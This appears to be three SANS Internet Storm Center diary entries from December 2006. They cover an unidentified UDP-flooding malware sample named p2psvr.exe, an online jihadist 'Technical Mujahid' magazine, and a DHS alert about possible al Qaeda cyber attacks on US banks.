Our reader Warren informed us that his office in China was infected by a rather nasty piece of malware. It flooded the network with UDP traffic on port 80 and was not recognized by any anti-virus tool. A single infected host sent 100 UDP packets / second.

Couple more hints that may help you identify this threat:

- The UDP port 80 traffic was directed at
- The file name used by the malware is p2psvr.exe (sorry, the binary was not preserved in the cleanup :-( ).
- the machine was also infected with PR_LOOKED.lF (according to Trend Micro).

I assume that the malware attempts to sneak past lazy firewall rules that allow port 80 tcp and udp outbound. The target does not appear to be a "special" host, but a DDoS is possible as a motive for the UDP traffic.

Reminder: if you come across odd infections like that, please preserve the malware for analysis.


Published: 2006-12-01

Technical Mujahid Magazine

As Johannes pointed out in the earlier diary, an alert was issued a few hours ago concerning potential attacks aimed at banking and financial web sites.  DHS and others are in agreement that this is not a big deal and that the warning was issued as a prudent measure.  While doing some research on this issue, we found an announcement that a new magazine was available online.  Details are at the Middle East Media Research Center and the Search for International Terrorist Entities.  I don't speak or read Arabic, Farsi, or Urdo but if one of our readers can take a look at it and provide a quick translation that would be great!  We suspect that there might be a loose connection between the publication of the magazine and the alert.

For sake of completeness, here is the link to the SITE discussion about the original posting that set in motion this chain of events. 

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-01

US DHS banking alert

A number of major news sites picked up on an alert issued by the US Department of Homeland Security (DHS), suggesting a major pending cyber attack by al Qaeda against US banking interests. The news coverage suggests that the attack will begin tomorrow and last until year's end.

The entire issue is probably best summarized by a quote from a DHS spokes person, published on CNN.com:

"There is no information to corroborate this aspirational threat. As a routine matter and out of an abundance of caution, US-CERT issued the situational awareness report to industry stakeholders,"

My short take on it: Make sure you follow best practices and keep your guard up. Its probably not going to be Al Qaeda, but someone will probe your defense tomorrow as they did today. And whatever helps against them will help if Al Qaeda should launch a cyber attack after all.

The Financial Services Information Sharing and Analysis Center (FS/ISAC) is currently posting a "Low Risk of Cyber Attacks" on its web site.